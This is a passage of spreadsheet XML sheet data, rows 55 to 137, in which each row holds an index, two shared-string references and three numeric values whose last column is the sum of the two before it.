      <c r="E55">
        <v>1076</v>
      </c>
      <c r="F55">
        <v>5123</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A56">
        <v>54</v>
      </c>
      <c r="B56" t="s">
        <v>114</v>
      </c>
      <c r="C56" t="s">
        <v>115</v>
      </c>
      <c r="D56">
        <v>5563</v>
      </c>
      <c r="E56">
        <v>2077</v>
      </c>
      <c r="F56">
        <v>7640</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A57">
        <v>55</v>
      </c>
      <c r="B57" t="s">
        <v>116</v>
      </c>
      <c r="C57" t="s">
        <v>117</v>
      </c>
      <c r="D57">
        <v>3801</v>
      </c>
      <c r="E57">
        <v>4188</v>
      </c>
      <c r="F57">
        <v>7989</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A58">
        <v>56</v>
      </c>
      <c r="B58" t="s">
        <v>118</v>
      </c>
      <c r="C58" t="s">
        <v>119</v>
      </c>
      <c r="D58">
        <v>1226</v>
      </c>
      <c r="E58">
        <v>1224</v>
      </c>
      <c r="F58">
        <v>2450</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A59">
        <v>57</v>
      </c>
      <c r="B59" t="s">
        <v>120</v>
      </c>
      <c r="C59" t="s">
        <v>121</v>
      </c>
      <c r="D59">
        <v>10378</v>
      </c>
      <c r="E59">
        <v>3180</v>
      </c>
      <c r="F59">
        <v>13558</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A60">
        <v>58</v>
      </c>
      <c r="B60" t="s">
        <v>122</v>
      </c>
      <c r="C60" t="s">
        <v>123</v>
      </c>
      <c r="D60">
        <v>2485</v>
      </c>
      <c r="E60">
        <v>1899</v>
      </c>
      <c r="F60">
        <v>4384</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A61">
        <v>59</v>
      </c>
      <c r="B61" t="s">
        <v>124</v>
      </c>
      <c r="C61" t="s">
        <v>125</v>
      </c>
      <c r="D61">
        <v>4997</v>
      </c>
      <c r="E61">
        <v>1977</v>
      </c>
      <c r="F61">
        <v>6974</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A62">
        <v>60</v>
      </c>
      <c r="B62" t="s">
        <v>126</v>
      </c>
      <c r="C62" t="s">
        <v>127</v>
      </c>
      <c r="D62">
        <v>8517</v>
      </c>
      <c r="E62">
        <v>6846</v>
      </c>
      <c r="F62">
        <v>15363</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A63">
        <v>61</v>
      </c>
      <c r="B63" t="s">
        <v>128</v>
      </c>
      <c r="C63" t="s">
        <v>129</v>
      </c>
      <c r="D63">
        <v>2520</v>
      </c>
      <c r="E63">
        <v>686</v>
      </c>
      <c r="F63">
        <v>3206</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A64">
        <v>62</v>
      </c>
      <c r="B64" t="s">
        <v>130</v>
      </c>
      <c r="C64" t="s">
        <v>131</v>
      </c>
      <c r="D64">
        <v>4590</v>
      </c>
      <c r="E64">
        <v>4428</v>
      </c>
      <c r="F64">
        <v>9018</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A65">
        <v>63</v>
      </c>
      <c r="B65" t="s">
        <v>132</v>
      </c>
      <c r="C65" t="s">
        <v>133</v>
      </c>
      <c r="D65">
        <v>2867</v>
      </c>
      <c r="E65">
        <v>1498</v>
      </c>
      <c r="F65">
        <v>4365</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A66">
        <v>64</v>
      </c>
      <c r="B66" t="s">
        <v>134</v>
      </c>
      <c r="C66" t="s">
        <v>135</v>
      </c>
      <c r="D66">
        <v>3394</v>
      </c>
      <c r="E66">
        <v>758</v>
      </c>
      <c r="F66">
        <v>4152</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A67">
        <v>65</v>
      </c>
      <c r="B67" t="s">
        <v>136</v>
      </c>
      <c r="C67" t="s">
        <v>137</v>
      </c>
      <c r="D67">
        <v>6097</v>
      </c>
      <c r="E67">
        <v>2008</v>
      </c>
      <c r="F67">
        <v>8105</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A68">
        <v>66</v>
      </c>
      <c r="B68" t="s">
        <v>138</v>
      </c>
      <c r="C68" t="s">
        <v>139</v>
      </c>
      <c r="D68">
        <v>5601</v>
      </c>
      <c r="E68">
        <v>5618</v>
      </c>
      <c r="F68">
        <v>11219</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A69">
        <v>67</v>
      </c>
      <c r="B69" t="s">
        <v>140</v>
      </c>
      <c r="C69" t="s">
        <v>141</v>
      </c>
      <c r="D69">
        <v>1703</v>
      </c>
      <c r="E69">
        <v>1627</v>
      </c>
      <c r="F69">
        <v>3330</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A70">
        <v>68</v>
      </c>
      <c r="B70" t="s">
        <v>142</v>
      </c>
      <c r="C70" t="s">
        <v>143</v>
      </c>
      <c r="D70">
        <v>1109</v>
      </c>
      <c r="E70">
        <v>717</v>
      </c>
      <c r="F70">
        <v>1826</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A71">
        <v>69</v>
      </c>
      <c r="B71" t="s">
        <v>144</v>
      </c>
      <c r="C71" t="s">
        <v>145</v>
      </c>
      <c r="D71">
        <v>1713</v>
      </c>
      <c r="E71">
        <v>1768</v>
      </c>
      <c r="F71">
        <v>3481</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A72">
        <v>70</v>
      </c>
      <c r="B72" t="s">
        <v>146</v>
      </c>
      <c r="C72" t="s">
        <v>147</v>
      </c>
      <c r="D72">
        <v>4324</v>
      </c>
      <c r="E72">
        <v>5274</v>
      </c>
      <c r="F72">
        <v>9598</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A73">
        <v>71</v>
      </c>
      <c r="B73" t="s">
        <v>148</v>
      </c>
      <c r="C73" t="s">
        <v>149</v>
      </c>
      <c r="D73">
        <v>4172</v>
      </c>
      <c r="E73">
        <v>4112</v>
      </c>
      <c r="F73">
        <v>8284</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A74">
        <v>72</v>
      </c>
      <c r="B74" t="s">
        <v>150</v>
      </c>
      <c r="C74" t="s">
        <v>151</v>
      </c>
      <c r="D74">
        <v>3361</v>
      </c>
      <c r="E74">
        <v>3866</v>
      </c>
      <c r="F74">
        <v>7227</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A75">
        <v>73</v>
      </c>
      <c r="B75" t="s">
        <v>152</v>
      </c>
      <c r="C75" t="s">
        <v>153</v>
      </c>
      <c r="D75">
        <v>760</v>
      </c>
      <c r="E75">
        <v>869</v>
      </c>
      <c r="F75">
        <v>1629</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A76">
        <v>74</v>
      </c>
      <c r="B76" t="s">
        <v>154</v>
      </c>
      <c r="C76" t="s">
        <v>155</v>
      </c>
      <c r="D76">
        <v>4512</v>
      </c>
      <c r="E76">
        <v>4827</v>
      </c>
      <c r="F76">
        <v>9339</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A77">
        <v>75</v>
      </c>
      <c r="B77" t="s">
        <v>156</v>
      </c>
      <c r="C77" t="s">
        <v>157</v>
      </c>
      <c r="D77">
        <v>2481</v>
      </c>
      <c r="E77">
        <v>2754</v>
      </c>
      <c r="F77">
        <v>5235</v>
      </c>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A78">
        <v>76</v>
      </c>
      <c r="B78" t="s">
        <v>158</v>
      </c>
      <c r="C78" t="s">
        <v>159</v>
      </c>
      <c r="D78">
        <v>1985</v>
      </c>
      <c r="E78">
        <v>1722</v>
      </c>
      <c r="F78">
        <v>3707</v>
      </c>
    </row>
    <row r="79" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A79">
        <v>77</v>
      </c>
      <c r="B79" t="s">
        <v>160</v>
      </c>
      <c r="C79" t="s">
        <v>161</v>
      </c>
      <c r="D79">
        <v>1638</v>
      </c>
      <c r="E79">
        <v>1388</v>
      </c>
      <c r="F79">
        <v>3026</v>
      </c>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A80">
        <v>78</v>
      </c>
      <c r="B80" t="s">
        <v>162</v>
      </c>
      <c r="C80" t="s">
        <v>163</v>
      </c>
      <c r="D80">
        <v>742</v>
      </c>
      <c r="E80">
        <v>926</v>
      </c>
      <c r="F80">
        <v>1668</v>
      </c>
    </row>
    <row r="81" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A81">
        <v>79</v>
      </c>
      <c r="B81" t="s">
        <v>164</v>
      </c>
      <c r="C81" t="s">
        <v>165</v>
      </c>
      <c r="D81">
        <v>2663</v>
      </c>
      <c r="E81">
        <v>3698</v>
      </c>
      <c r="F81">
        <v>6361</v>
      </c>
    </row>
    <row r="82" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A82">
        <v>80</v>
      </c>
      <c r="B82" t="s">
        <v>166</v>
      </c>
      <c r="C82" t="s">
        <v>167</v>
      </c>
      <c r="D82">
        <v>1638</v>
      </c>
      <c r="E82">
        <v>1392</v>
      </c>
      <c r="F82">
        <v>3030</v>
      </c>
    </row>
    <row r="83" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A83">
        <v>81</v>
      </c>
      <c r="B83" t="s">
        <v>168</v>
      </c>
      <c r="C83" t="s">
        <v>169</v>
      </c>
      <c r="D83">
        <v>1046</v>
      </c>
      <c r="E83">
        <v>946</v>
      </c>
      <c r="F83">
        <v>1992</v>
      </c>
    </row>
    <row r="84" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A84">
        <v>82</v>
      </c>
      <c r="B84" t="s">
        <v>170</v>
      </c>
      <c r="C84" t="s">
        <v>171</v>
      </c>
      <c r="D84">
        <v>863</v>
      </c>
      <c r="E84">
        <v>351</v>
      </c>
      <c r="F84">
        <v>1214</v>
      </c>
    </row>
    <row r="85" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A85">
        <v>83</v>
      </c>
      <c r="B85" t="s">
        <v>172</v>
      </c>
      <c r="C85" t="s">
        <v>173</v>
      </c>
      <c r="D85">
        <v>10875</v>
      </c>
      <c r="E85">
        <v>1811</v>
      </c>
      <c r="F85">
        <v>12686</v>
      </c>
    </row>
    <row r="86" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A86">
        <v>84</v>
      </c>
      <c r="B86" t="s">
        <v>174</v>
      </c>
      <c r="C86" t="s">
        <v>175</v>
      </c>
      <c r="D86">
        <v>2251</v>
      </c>
      <c r="E86">
        <v>2770</v>
      </c>
      <c r="F86">
        <v>5021</v>
      </c>
    </row>
    <row r="87" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A87">
        <v>85</v>
      </c>
      <c r="B87" t="s">
        <v>176</v>
      </c>
      <c r="C87" t="s">
        <v>177</v>
      </c>
      <c r="D87">
        <v>3801</v>
      </c>
      <c r="E87">
        <v>3631</v>
      </c>
      <c r="F87">
        <v>7432</v>
      </c>
    </row>
    <row r="88" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A88">
        <v>86</v>
      </c>
      <c r="B88" t="s">
        <v>178</v>
      </c>
      <c r="C88" t="s">
        <v>179</v>
      </c>
      <c r="D88">
        <v>3453</v>
      </c>
      <c r="E88">
        <v>3660</v>
      </c>
      <c r="F88">
        <v>7113</v>
      </c>
    </row>
    <row r="89" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A89">
        <v>87</v>
      </c>
      <c r="B89" t="s">
        <v>180</v>
      </c>
      <c r="C89" t="s">
        <v>181</v>
      </c>
      <c r="D89">
        <v>6198</v>
      </c>
      <c r="E89">
        <v>1879</v>
      </c>
      <c r="F89">
        <v>8077</v>
      </c>
    </row>
    <row r="90" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A90">
        <v>88</v>
      </c>
      <c r="B90" t="s">
        <v>182</v>
      </c>
      <c r="C90" t="s">
        <v>183</v>
      </c>
      <c r="D90">
        <v>4185</v>
      </c>
      <c r="E90">
        <v>4415</v>
      </c>
      <c r="F90">
        <v>8600</v>
      </c>
    </row>
    <row r="91" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A91">
        <v>89</v>
      </c>
      <c r="B91" t="s">
        <v>184</v>
      </c>
      <c r="C91" t="s">
        <v>185</v>
      </c>
      <c r="D91">
        <v>1840</v>
      </c>
      <c r="E91">
        <v>1661</v>
      </c>
      <c r="F91">
        <v>3501</v>
      </c>
    </row>
    <row r="92" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A92">
        <v>90</v>
      </c>
      <c r="B92" t="s">
        <v>186</v>
      </c>
      <c r="C92" t="s">
        <v>187</v>
      </c>
      <c r="D92">
        <v>4792</v>
      </c>
      <c r="E92">
        <v>2708</v>
      </c>
      <c r="F92">
        <v>7500</v>
      </c>
    </row>
    <row r="93" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A93">
        <v>91</v>
      </c>
      <c r="B93" t="s">
        <v>188</v>
      </c>
      <c r="C93" t="s">
        <v>189</v>
      </c>
      <c r="D93">
        <v>9157</v>
      </c>
      <c r="E93">
        <v>2229</v>
      </c>
      <c r="F93">
        <v>11386</v>
      </c>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A94">
        <v>92</v>
      </c>
      <c r="B94" t="s">
        <v>190</v>
      </c>
      <c r="C94" t="s">
        <v>191</v>
      </c>
      <c r="D94">
        <v>1380</v>
      </c>
      <c r="E94">
        <v>1118</v>
      </c>
      <c r="F94">
        <v>2498</v>
      </c>
    </row>
    <row r="95" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A95">
        <v>93</v>
      </c>
      <c r="B95" t="s">
        <v>192</v>
      </c>
      <c r="C95" t="s">
        <v>193</v>
      </c>
      <c r="D95">
        <v>2237</v>
      </c>
      <c r="E95">
        <v>3045</v>
      </c>
      <c r="F95">
        <v>5282</v>
      </c>
    </row>
    <row r="96" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A96">
        <v>94</v>
      </c>
      <c r="B96" t="s">
        <v>194</v>
      </c>
      <c r="C96" t="s">
        <v>195</v>
      </c>
      <c r="D96">
        <v>1003</v>
      </c>
      <c r="E96">
        <v>933</v>
      </c>
      <c r="F96">
        <v>1936</v>
      </c>
    </row>
    <row r="97" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A97">
        <v>95</v>
      </c>
      <c r="B97" t="s">
        <v>196</v>
      </c>
      <c r="C97" t="s">
        <v>197</v>
      </c>
      <c r="D97">
        <v>1297</v>
      </c>
      <c r="E97">
        <v>1171</v>
      </c>
      <c r="F97">
        <v>2468</v>
      </c>
    </row>
    <row r="98" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A98">
        <v>96</v>
      </c>
      <c r="B98" t="s">
        <v>198</v>
      </c>
      <c r="C98" t="s">
        <v>199</v>
      </c>
      <c r="D98">
        <v>8887</v>
      </c>
      <c r="E98">
        <v>3000</v>
      </c>
      <c r="F98">
        <v>11887</v>
      </c>
    </row>
    <row r="99" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A99">
        <v>97</v>
      </c>
      <c r="B99" t="s">
        <v>200</v>
      </c>
      <c r="C99" t="s">
        <v>201</v>
      </c>
      <c r="D99">
        <v>15475</v>
      </c>
      <c r="E99">
        <v>3765</v>
      </c>
      <c r="F99">
        <v>19240</v>
      </c>
    </row>
    <row r="100" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A100">
        <v>98</v>
      </c>
      <c r="B100" t="s">
        <v>202</v>
      </c>
      <c r="C100" t="s">
        <v>203</v>
      </c>
      <c r="D100">
        <v>14828</v>
      </c>
      <c r="E100">
        <v>2708</v>
      </c>
      <c r="F100">
        <v>17536</v>
      </c>
    </row>
    <row r="101" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A101">
        <v>99</v>
      </c>
      <c r="B101" t="s">
        <v>204</v>
      </c>
      <c r="C101" t="s">
        <v>205</v>
      </c>
      <c r="D101">
        <v>3924</v>
      </c>
      <c r="E101">
        <v>3779</v>
      </c>
      <c r="F101">
        <v>7703</v>
      </c>
    </row>
    <row r="102" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A102">
        <v>100</v>
      </c>
      <c r="B102" t="s">
        <v>206</v>
      </c>
      <c r="C102" t="s">
        <v>207</v>
      </c>
      <c r="D102">
        <v>2268</v>
      </c>
      <c r="E102">
        <v>2462</v>
      </c>
      <c r="F102">
        <v>4730</v>
      </c>
    </row>
    <row r="103" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A103">
        <v>101</v>
      </c>
      <c r="B103" t="s">
        <v>208</v>
      </c>
      <c r="C103" t="s">
        <v>209</v>
      </c>
      <c r="D103">
        <v>7476</v>
      </c>
      <c r="E103">
        <v>1112</v>
      </c>
      <c r="F103">
        <v>8588</v>
      </c>
    </row>
    <row r="104" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A104">
        <v>102</v>
      </c>
      <c r="B104" t="s">
        <v>210</v>
      </c>
      <c r="C104" t="s">
        <v>211</v>
      </c>
      <c r="D104">
        <v>1574</v>
      </c>
      <c r="E104">
        <v>1163</v>
      </c>
      <c r="F104">
        <v>2737</v>
      </c>
    </row>
    <row r="105" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A105">
        <v>103</v>
      </c>
      <c r="B105" t="s">
        <v>212</v>
      </c>
      <c r="C105" t="s">
        <v>213</v>
      </c>
      <c r="D105">
        <v>4656</v>
      </c>
      <c r="E105">
        <v>2069</v>
      </c>
      <c r="F105">
        <v>6725</v>
      </c>
    </row>
    <row r="106" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A106">
        <v>104</v>
      </c>
      <c r="B106" t="s">
        <v>214</v>
      </c>
      <c r="C106" t="s">
        <v>215</v>
      </c>
      <c r="D106">
        <v>6229</v>
      </c>
      <c r="E106">
        <v>2508</v>
      </c>
      <c r="F106">
        <v>8737</v>
      </c>
    </row>
    <row r="107" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A107">
        <v>105</v>
      </c>
      <c r="B107" t="s">
        <v>216</v>
      </c>
      <c r="C107" t="s">
        <v>217</v>
      </c>
      <c r="D107">
        <v>4768</v>
      </c>
      <c r="E107">
        <v>1154</v>
      </c>
      <c r="F107">
        <v>5922</v>
      </c>
    </row>
    <row r="108" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A108">
        <v>106</v>
      </c>
      <c r="B108" t="s">
        <v>218</v>
      </c>
      <c r="C108" t="s">
        <v>219</v>
      </c>
      <c r="D108">
        <v>9338</v>
      </c>
      <c r="E108">
        <v>1959</v>
      </c>
      <c r="F108">
        <v>11297</v>
      </c>
    </row>
    <row r="109" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A109">
        <v>107</v>
      </c>
      <c r="B109" t="s">
        <v>220</v>
      </c>
      <c r="C109" t="s">
        <v>221</v>
      </c>
      <c r="D109">
        <v>14671</v>
      </c>
      <c r="E109">
        <v>2044</v>
      </c>
      <c r="F109">
        <v>16715</v>
      </c>
    </row>
    <row r="110" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A110">
        <v>108</v>
      </c>
      <c r="B110" t="s">
        <v>222</v>
      </c>
      <c r="C110" t="s">
        <v>223</v>
      </c>
      <c r="D110">
        <v>6859</v>
      </c>
      <c r="E110">
        <v>3270</v>
      </c>
      <c r="F110">
        <v>10129</v>
      </c>
    </row>
    <row r="111" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A111">
        <v>109</v>
      </c>
      <c r="B111" t="s">
        <v>224</v>
      </c>
      <c r="C111" t="s">
        <v>225</v>
      </c>
      <c r="D111">
        <v>5366</v>
      </c>
      <c r="E111">
        <v>818</v>
      </c>
      <c r="F111">
        <v>6184</v>
      </c>
    </row>
    <row r="112" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A112">
        <v>110</v>
      </c>
      <c r="B112" t="s">
        <v>226</v>
      </c>
      <c r="C112" t="s">
        <v>227</v>
      </c>
      <c r="D112">
        <v>2315</v>
      </c>
      <c r="E112">
        <v>1181</v>
      </c>
      <c r="F112">
        <v>3496</v>
      </c>
    </row>
    <row r="113" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A113">
        <v>111</v>
      </c>
      <c r="B113" t="s">
        <v>228</v>
      </c>
      <c r="C113" t="s">
        <v>229</v>
      </c>
      <c r="D113">
        <v>8303</v>
      </c>
      <c r="E113">
        <v>8192</v>
      </c>
      <c r="F113">
        <v>16495</v>
      </c>
    </row>
    <row r="114" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A114">
        <v>112</v>
      </c>
      <c r="B114" t="s">
        <v>230</v>
      </c>
      <c r="C114" t="s">
        <v>231</v>
      </c>
      <c r="D114">
        <v>3481</v>
      </c>
      <c r="E114">
        <v>3090</v>
      </c>
      <c r="F114">
        <v>6571</v>
      </c>
    </row>
    <row r="115" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A115">
        <v>113</v>
      </c>
      <c r="B115" t="s">
        <v>232</v>
      </c>
      <c r="C115" t="s">
        <v>233</v>
      </c>
      <c r="D115">
        <v>1968</v>
      </c>
      <c r="E115">
        <v>1130</v>
      </c>
      <c r="F115">
        <v>3098</v>
      </c>
    </row>
    <row r="116" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A116">
        <v>114</v>
      </c>
      <c r="B116" t="s">
        <v>234</v>
      </c>
      <c r="C116" t="s">
        <v>235</v>
      </c>
      <c r="D116">
        <v>1927</v>
      </c>
      <c r="E116">
        <v>1256</v>
      </c>
      <c r="F116">
        <v>3183</v>
      </c>
    </row>
    <row r="117" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A117">
        <v>115</v>
      </c>
      <c r="B117" t="s">
        <v>236</v>
      </c>
      <c r="C117" t="s">
        <v>237</v>
      </c>
      <c r="D117">
        <v>2257</v>
      </c>
      <c r="E117">
        <v>1971</v>
      </c>
      <c r="F117">
        <v>4228</v>
      </c>
    </row>
    <row r="118" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A118">
        <v>116</v>
      </c>
      <c r="B118" t="s">
        <v>238</v>
      </c>
      <c r="C118" t="s">
        <v>239</v>
      </c>
      <c r="D118">
        <v>5718</v>
      </c>
      <c r="E118">
        <v>3594</v>
      </c>
      <c r="F118">
        <v>9312</v>
      </c>
    </row>
    <row r="119" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A119">
        <v>117</v>
      </c>
      <c r="B119" t="s">
        <v>240</v>
      </c>
      <c r="C119" t="s">
        <v>241</v>
      </c>
      <c r="D119">
        <v>18371</v>
      </c>
      <c r="E119">
        <v>2813</v>
      </c>
      <c r="F119">
        <v>21184</v>
      </c>
    </row>
    <row r="120" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A120">
        <v>118</v>
      </c>
      <c r="B120" t="s">
        <v>242</v>
      </c>
      <c r="C120" t="s">
        <v>243</v>
      </c>
      <c r="D120">
        <v>1285</v>
      </c>
      <c r="E120">
        <v>1168</v>
      </c>
      <c r="F120">
        <v>2453</v>
      </c>
    </row>
    <row r="121" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A121">
        <v>119</v>
      </c>
      <c r="B121" t="s">
        <v>244</v>
      </c>
      <c r="C121" t="s">
        <v>245</v>
      </c>
      <c r="D121">
        <v>6094</v>
      </c>
      <c r="E121">
        <v>1879</v>
      </c>
      <c r="F121">
        <v>7973</v>
      </c>
    </row>
    <row r="122" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A122">
        <v>120</v>
      </c>
      <c r="B122" t="s">
        <v>246</v>
      </c>
      <c r="C122" t="s">
        <v>247</v>
      </c>
      <c r="D122">
        <v>8896</v>
      </c>
      <c r="E122">
        <v>1679</v>
      </c>
      <c r="F122">
        <v>10575</v>
      </c>
    </row>
    <row r="123" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A123">
        <v>121</v>
      </c>
      <c r="B123" t="s">
        <v>248</v>
      </c>
      <c r="C123" t="s">
        <v>249</v>
      </c>
      <c r="D123">
        <v>2456</v>
      </c>
      <c r="E123">
        <v>2335</v>
      </c>
      <c r="F123">
        <v>4791</v>
      </c>
    </row>
    <row r="124" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A124">
        <v>122</v>
      </c>
      <c r="B124" t="s">
        <v>250</v>
      </c>
      <c r="C124" t="s">
        <v>251</v>
      </c>
      <c r="D124">
        <v>12044</v>
      </c>
      <c r="E124">
        <v>1599</v>
      </c>
      <c r="F124">
        <v>13643</v>
      </c>
    </row>
    <row r="125" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A125">
        <v>123</v>
      </c>
      <c r="B125" t="s">
        <v>252</v>
      </c>
      <c r="C125" t="s">
        <v>253</v>
      </c>
      <c r="D125">
        <v>24567</v>
      </c>
      <c r="E125">
        <v>1864</v>
      </c>
      <c r="F125">
        <v>26431</v>
      </c>
    </row>
    <row r="126" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A126">
        <v>124</v>
      </c>
      <c r="B126" t="s">
        <v>254</v>
      </c>
      <c r="C126" t="s">
        <v>255</v>
      </c>
      <c r="D126">
        <v>3067</v>
      </c>
      <c r="E126">
        <v>2515</v>
      </c>
      <c r="F126">
        <v>5582</v>
      </c>
    </row>
    <row r="127" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A127">
        <v>125</v>
      </c>
      <c r="B127" t="s">
        <v>256</v>
      </c>
      <c r="C127" t="s">
        <v>257</v>
      </c>
      <c r="D127">
        <v>6968</v>
      </c>
      <c r="E127">
        <v>6961</v>
      </c>
      <c r="F127">
        <v>13929</v>
      </c>
    </row>
    <row r="128" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A128">
        <v>126</v>
      </c>
      <c r="B128" t="s">
        <v>258</v>
      </c>
      <c r="C128" t="s">
        <v>259</v>
      </c>
      <c r="D128">
        <v>8410</v>
      </c>
      <c r="E128">
        <v>1718</v>
      </c>
      <c r="F128">
        <v>10128</v>
      </c>
    </row>
    <row r="129" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A129">
        <v>127</v>
      </c>
      <c r="B129" t="s">
        <v>260</v>
      </c>
      <c r="C129" t="s">
        <v>261</v>
      </c>
      <c r="D129">
        <v>1805</v>
      </c>
      <c r="E129">
        <v>1170</v>
      </c>
      <c r="F129">
        <v>2975</v>
      </c>
    </row>
    <row r="130" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A130">
        <v>128</v>
      </c>
      <c r="B130" t="s">
        <v>262</v>
      </c>
      <c r="C130" t="s">
        <v>263</v>
      </c>
      <c r="D130">
        <v>1570</v>
      </c>
      <c r="E130">
        <v>1623</v>
      </c>
      <c r="F130">
        <v>3193</v>
      </c>
    </row>
    <row r="131" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A131">
        <v>129</v>
      </c>
      <c r="B131" t="s">
        <v>264</v>
      </c>
      <c r="C131" t="s">
        <v>265</v>
      </c>
      <c r="D131">
        <v>6312</v>
      </c>
      <c r="E131">
        <v>1614</v>
      </c>
      <c r="F131">
        <v>7926</v>
      </c>
    </row>
    <row r="132" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A132">
        <v>130</v>
      </c>
      <c r="B132" t="s">
        <v>266</v>
      </c>
      <c r="C132" t="s">
        <v>267</v>
      </c>
      <c r="D132">
        <v>4298</v>
      </c>
      <c r="E132">
        <v>1711</v>
      </c>
      <c r="F132">
        <v>6009</v>
      </c>
    </row>
    <row r="133" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A133">
        <v>131</v>
      </c>
      <c r="B133" t="s">
        <v>268</v>
      </c>
      <c r="C133" t="s">
        <v>269</v>
      </c>
      <c r="D133">
        <v>8638</v>
      </c>
      <c r="E133">
        <v>6315</v>
      </c>
      <c r="F133">
        <v>14953</v>
      </c>
    </row>
    <row r="134" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A134">
        <v>132</v>
      </c>
      <c r="B134" t="s">
        <v>270</v>
      </c>
      <c r="C134" t="s">
        <v>271</v>
      </c>
      <c r="D134">
        <v>8521</v>
      </c>
      <c r="E134">
        <v>897</v>
      </c>
      <c r="F134">
        <v>9418</v>
      </c>
    </row>
    <row r="135" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A135">
        <v>133</v>
      </c>
      <c r="B135" t="s">
        <v>272</v>
      </c>
      <c r="C135" t="s">
        <v>273</v>
      </c>
      <c r="D135">
        <v>8852</v>
      </c>
      <c r="E135">
        <v>2322</v>
      </c>
      <c r="F135">
        <v>11174</v>
      </c>
    </row>
    <row r="136" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A136">
        <v>134</v>
      </c>
      <c r="B136" t="s">
        <v>274</v>
      </c>
      <c r="C136" t="s">
        <v>275</v>
      </c>
      <c r="D136">
        <v>6551</v>
      </c>
      <c r="E136">
        <v>1883</v>
      </c>
      <c r="F136">
        <v>8434</v>
      </c>
    </row>
    <row r="137" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A137">
        <v>135</v>
      </c>
